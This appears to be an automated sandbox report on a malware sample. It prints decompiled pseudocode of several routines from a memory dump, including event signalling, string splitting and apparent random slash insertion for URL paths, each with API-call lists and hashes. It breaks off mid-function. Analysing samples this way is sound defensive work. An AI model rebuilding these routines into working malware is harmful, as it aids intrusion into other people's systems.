                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC1970: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00FC3EC5,74666F53,00000000,?,00000000,?,?,00FC2F4F), ref: 00FC19A6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC1970: lstrcpy.KERNEL32(00000000,00000000), ref: 00FC19CA
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC1970: lstrcat.KERNEL32(00000000,00000000), ref: 00FC19D2
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00FCA2D4,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00FC7338,?,?,?), ref: 00FC4D14
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2A03: HeapFree.KERNEL32(00000000,00000000,00FC4072,00000000,?,?,00000000,?,?,?,?,?,?,00FC44AE,00000000), ref: 00FC2A0F
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00004E20,00FC7338,00000000,?,00000000,?,00FC7338,?,?,?,?,?,?,?,00FC1C40), ref: 00FC4D72
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00FC7338,?,?,?), ref: 00FC4DA0
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00FC7338,?,?,?), ref: 00FC4DB8
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 73268831-0
                                                                                                                                                                                                                                                                                    • Opcode ID: fce2894d17a0d981cba3375c87ca9ee312f5d5355026fbd42c1c321ddd6e828e
                                                                                                                                                                                                                                                                                    • Instruction ID: 14927055093d2993cf3dd386f04a2599d5c845f27bc6cefc0dd747dedd5a8952
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fce2894d17a0d981cba3375c87ca9ee312f5d5355026fbd42c1c321ddd6e828e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0921D332E0072B5BD7216BA89F5BF9B72D8AF44720F05022CFD4397295DB74EC00A694
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                                                                                                                                                                    			E00FC7289(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                                                                                                    				signed int* _t39;
                                                                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t36 = __ecx;
                                                                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				_v12 = _a4;
                                                                                                                                                                                                                                                                                    				_t38 = E00FC2616(__ecx,  &_v32);
                                                                                                                                                                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                                                                    					_t39 = _a8;
                                                                                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                                                                                    					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                    						_t23 =  &(_t39[1]);
                                                                                                                                                                                                                                                                                    						if(_t39[1] != 0) {
                                                                                                                                                                                                                                                                                    							E00FC28B8(_t23);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return _t38;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(E00FC4380(0x40,  &_v16) != 0) {
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t40 = CreateEventA(0xfca2d4, 1, 0,  *0xfca394);
                                                                                                                                                                                                                                                                                    				if(_t40 != 0) {
                                                                                                                                                                                                                                                                                    					SetEvent(_t40);
                                                                                                                                                                                                                                                                                    					Sleep(0xbb8);
                                                                                                                                                                                                                                                                                    					CloseHandle(_t40);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_push( &_v32);
                                                                                                                                                                                                                                                                                    				if(_a12 == 0) {
                                                                                                                                                                                                                                                                                    					_t29 = E00FC7360(_t36);
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_t29 = E00FC202E(_t36);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t41 = _v16;
                                                                                                                                                                                                                                                                                    				_t38 = _t29;
                                                                                                                                                                                                                                                                                    				if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    					E00FC3EFA(_t41);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t39 = _a8;
                                                                                                                                                                                                                                                                                    					_t38 = E00FC4CD5( &_v32, _t39);
                                                                                                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00FCA2D4,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,00FC1C40,?,00000001), ref: 00FC72DA
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,?,00FC1C40,?,00000001,00FC2F7D,00000002,?,?,00FC2F7D), ref: 00FC72E7
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8,?,?,?,?,00FC1C40,?,00000001,00FC2F7D,00000002,?,?,00FC2F7D), ref: 00FC72F2
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00FC1C40,?,00000001,00FC2F7D,00000002,?,?,00FC2F7D), ref: 00FC72F9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC7360: WaitForSingleObject.KERNEL32(00000000,?,?,?,00FC7319,?,00FC7319,?,?,?,?,?,00FC7319,?), ref: 00FC743A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC7360: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00FC7319,?,?,?,?,?,00FC1C40,?), ref: 00FC7462
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseEvent$CreateHandleObjectSingleSleepWait
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 467273019-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 372642618bc90ea6886eb563816e20a92ff511be2c9eab072d5af4d674cdbad7
                                                                                                                                                                                                                                                                                    • Instruction ID: 2bf8c30b4023ef827399fd46ef920feaec7555a5d323a8fad46d4088d1edd216
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 372642618bc90ea6886eb563816e20a92ff511be2c9eab072d5af4d674cdbad7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA21A132D0425BABCB20BFB48E87EDE7779AB44360B04442DFA11A7140D774A901BFA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                    			E00FC4138(unsigned int __eax, void* __ecx) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                                                                                                    				signed short _t23;
                                                                                                                                                                                                                                                                                    				char* _t27;
                                                                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                                                                    				unsigned int _t33;
                                                                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                                                                    				unsigned int _t38;
                                                                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t42 = __eax;
                                                                                                                                                                                                                                                                                    				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                                                                                                                                                                                    				_t38 = __eax;
                                                                                                                                                                                                                                                                                    				_t30 = RtlAllocateHeap( *0xfca290, 0, (__eax >> 3) + __eax + 1);
                                                                                                                                                                                                                                                                                    				_v12 = _t30;
                                                                                                                                                                                                                                                                                    				if(_t30 != 0) {
                                                                                                                                                                                                                                                                                    					_v8 = _t42;
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						_t33 = 0x18;
                                                                                                                                                                                                                                                                                    						if(_t38 <= _t33) {
                                                                                                                                                                                                                                                                                    							_t33 = _t38;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t21 =  *0xfca2a8; // 0x2f4f5b36
                                                                                                                                                                                                                                                                                    						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                                                                                                                                                                                    						 *0xfca2a8 = _t23;
                                                                                                                                                                                                                                                                                    						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                                                                                                                                                                                    						memcpy(_t30, _v8, _t45);
                                                                                                                                                                                                                                                                                    						_v8 = _v8 + _t45;
                                                                                                                                                                                                                                                                                    						_t27 = _t30 + _t45;
                                                                                                                                                                                                                                                                                    						_t38 = _t38 - _t45;
                                                                                                                                                                                                                                                                                    						_t46 = _t46 + 0xc;
                                                                                                                                                                                                                                                                                    						 *_t27 = 0x2f;
                                                                                                                                                                                                                                                                                    						_t13 = _t27 + 1; // 0x1
                                                                                                                                                                                                                                                                                    						_t30 = _t13;
                                                                                                                                                                                                                                                                                    					} while (_t38 > 8);
                                                                                                                                                                                                                                                                                    					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}


                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00FC5B76,00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC4143
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 00FC415B
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,038F9630,-00000008,?,?,?,00FC5B76,00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC419F
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000001,038F9630,00000001,00FC6301,00000000,038F9630), ref: 00FC41C0
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1819133394-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8944bfcc7d5beb33b95edd5e23a876bfdf337341fc3548b1958861b322c36b4e
                                                                                                                                                                                                                                                                                    • Instruction ID: 11a45d3c8e1d4b2bd1403440eb7b2cf1f64a6ce27e8019b3915b39a8cb64f3a7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8944bfcc7d5beb33b95edd5e23a876bfdf337341fc3548b1958861b322c36b4e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB110672A0021DAFC711CB69DD8AE9EBBBEEB94360B15016AF40497150E671AE44A760
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                    			E00FC49BA(char* __eax) {
                                                                                                                                                                                                                                                                                    				char* _t8;
                                                                                                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                                                                                                    				char* _t21;
                                                                                                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                                                                                                    				char* _t24;
                                                                                                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t21 = __eax;
                                                                                                                                                                                                                                                                                    				_push(0x20);
                                                                                                                                                                                                                                                                                    				_t23 = 1;
                                                                                                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t8 = StrChrA();
                                                                                                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t23 = _t23 + 1;
                                                                                                                                                                                                                                                                                    					_push(0x20);
                                                                                                                                                                                                                                                                                    					_push( &(_t8[1]));
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t12 = E00FC5C4E(_t23 << 2);
                                                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                                                                                                                                                                                                                                                    				if(_t12 != 0) {
                                                                                                                                                                                                                                                                                    					StrTrimA(_t21, 0xfc92c4);
                                                                                                                                                                                                                                                                                    					_t26 = 0;
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						_t24 = StrChrA(_t21, 0x20);
                                                                                                                                                                                                                                                                                    						if(_t24 != 0) {
                                                                                                                                                                                                                                                                                    							 *_t24 = 0;
                                                                                                                                                                                                                                                                                    							_t24 =  &(_t24[1]);
                                                                                                                                                                                                                                                                                    							StrTrimA(_t24, 0xfc92c4);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                                                                                                                                                                                                                                                    						_t26 = _t26 + 1;
                                                                                                                                                                                                                                                                                    						_t21 = _t24;
                                                                                                                                                                                                                                                                                    					} while (_t24 != 0);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,00000020,00000000,038F962C,?,?,?,00FC6072,038F962C,?,?,00FC2F44), ref: 00FC49D4
                                                                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(?,00FC92C4,00000002,?,?,?,00FC6072,038F962C,?,?,00FC2F44), ref: 00FC49F3
                                                                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,00000020,?,?,?,00FC6072,038F962C,?,?,00FC2F44,?,?,?,?,?,00FC44F9), ref: 00FC49FE
                                                                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000001,00FC92C4,?,?,?,00FC6072,038F962C,?,?,00FC2F44,?,?,?,?,?,00FC44F9), ref: 00FC4A10
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Trim
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3043112668-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d01298d9b69856ec2234d679e5df01939996101a6f136bf8ad02ac308713f681
                                                                                                                                                                                                                                                                                    • Instruction ID: d98b1447f78e3c2217ac175a6ec4b96642be26739c67ad1f213bfefbd472adec
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d01298d9b69856ec2234d679e5df01939996101a6f136bf8ad02ac308713f681
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56012D71A443276FD321CF158D4BF277E98EB85B64F11050CF581C7280D774EC01A6A1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                    			E00FC1970(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                                                                    				char* _t18;
                                                                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t19 = 0x27;
                                                                                                                                                                                                                                                                                    				_t1 =  &_v20; // 0x74666f53
                                                                                                                                                                                                                                                                                    				_t18 = 0;
                                                                                                                                                                                                                                                                                    				E00FC354E(_t8, _t1);
                                                                                                                                                                                                                                                                                    				_t16 = E00FC5C4E(_t19);
                                                                                                                                                                                                                                                                                    				if(_t16 != 0) {
                                                                                                                                                                                                                                                                                    					_t3 =  &_v20; // 0x74666f53
                                                                                                                                                                                                                                                                                    					_t13 = E00FC756E(_t3, _t16, _a8);
                                                                                                                                                                                                                                                                                    					if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    						__imp__(_a4);
                                                                                                                                                                                                                                                                                    						_t19 = _t13 + 0x27;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t18 = E00FC5C4E(_t19);
                                                                                                                                                                                                                                                                                    					if(_t18 != 0) {
                                                                                                                                                                                                                                                                                    						 *_t18 = 0;
                                                                                                                                                                                                                                                                                    						if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    							__imp__(_t18, _a4);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						__imp__(_t18, _t16);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00FC2A03(_t16);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t18;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    0x00fc19d2
                                                                                                                                                                                                                                                                                    0x00fc19d2
                                                                                                                                                                                                                                                                                    0x00fc19d9
                                                                                                                                                                                                                                                                                    0x00fc19d9
                                                                                                                                                                                                                                                                                    0x00fc19e4

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC756E: wsprintfA.USER32 ref: 00FC75CA
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00FC3EC5,74666F53,00000000,?,00000000,?,?,00FC2F4F), ref: 00FC19A6
                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC19CA
                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FC19D2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                    • String ID: Soft
                                                                                                                                                                                                                                                                                    • API String ID: 393707159-3753413193
                                                                                                                                                                                                                                                                                    • Opcode ID: 73c99f15c0cfc524b6f6678c57432babb72e6a142edc0f2c81badb9738d81a9a
                                                                                                                                                                                                                                                                                    • Instruction ID: 98ccc357d2b37d1c9e64de6c23ecb74c0ab451e4d173618f84ebfc1742cf6548
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73c99f15c0cfc524b6f6678c57432babb72e6a142edc0f2c81badb9738d81a9a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3601F23250020FA7CB227B758E8AFEF3A6CAF81354F044029F90456102DB788955E7A1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                                                                    			E00FC6027(void** __esi) {
                                                                                                                                                                                                                                                                                    				char* _v0;
                                                                                                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                                                                    				void** _t14;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t14 = __esi;
                                                                                                                                                                                                                                                                                    				_t4 =  *0xfca37c; // 0x38f9630
                                                                                                                                                                                                                                                                                    				__imp__(_t4 + 0x40);
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t6 =  *0xfca37c; // 0x38f9630
                                                                                                                                                                                                                                                                                    					_t1 = _t6 + 0x58; // 0x0
                                                                                                                                                                                                                                                                                    					if( *_t1 == 0) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(0xa);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t8 =  *_t14;
                                                                                                                                                                                                                                                                                    				if(_t8 != 0 && _t8 != 0xfca030) {
                                                                                                                                                                                                                                                                                    					HeapFree( *0xfca290, 0, _t8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t14[1] = E00FC49BA(_v0, _t14);
                                                                                                                                                                                                                                                                                    				_t11 =  *0xfca37c; // 0x38f9630
                                                                                                                                                                                                                                                                                    				_t12 = _t11 + 0x40;
                                                                                                                                                                                                                                                                                    				__imp__(_t12);
                                                                                                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(038F95F0), ref: 00FC6030
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,?,00FC2F44,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC603A
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,00FC2F44,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC6062
                                                                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(038F95F0), ref: 00FC607E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 58946197-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3839d3b9cdd866ec78c553f05191f227e5b62db89fc662ea550cbe0a0eb46963
                                                                                                                                                                                                                                                                                    • Instruction ID: f2c8041f4b5f4d42b7fb8946292a32002f3f60931091b3faa58c43bffd6ee875
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3839d3b9cdd866ec78c553f05191f227e5b62db89fc662ea550cbe0a0eb46963
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AF0583068864A9BEB208F38EF4BF1A77A4AB44744B018009F845E7261C231F804FB26
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00FC1547() {
                                                                                                                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                                                                                                                    				intOrPtr _t5;
                                                                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t1 =  *0xfca2c4; // 0x228
                                                                                                                                                                                                                                                                                    				if(_t1 == 0) {
                                                                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				SetEvent(_t1);
                                                                                                                                                                                                                                                                                    				_t11 = 0x7fffffff;
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					SleepEx(0x64, 1);
                                                                                                                                                                                                                                                                                    					_t5 =  *0xfca304; // 0x0
                                                                                                                                                                                                                                                                                    					if(_t5 == 0) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
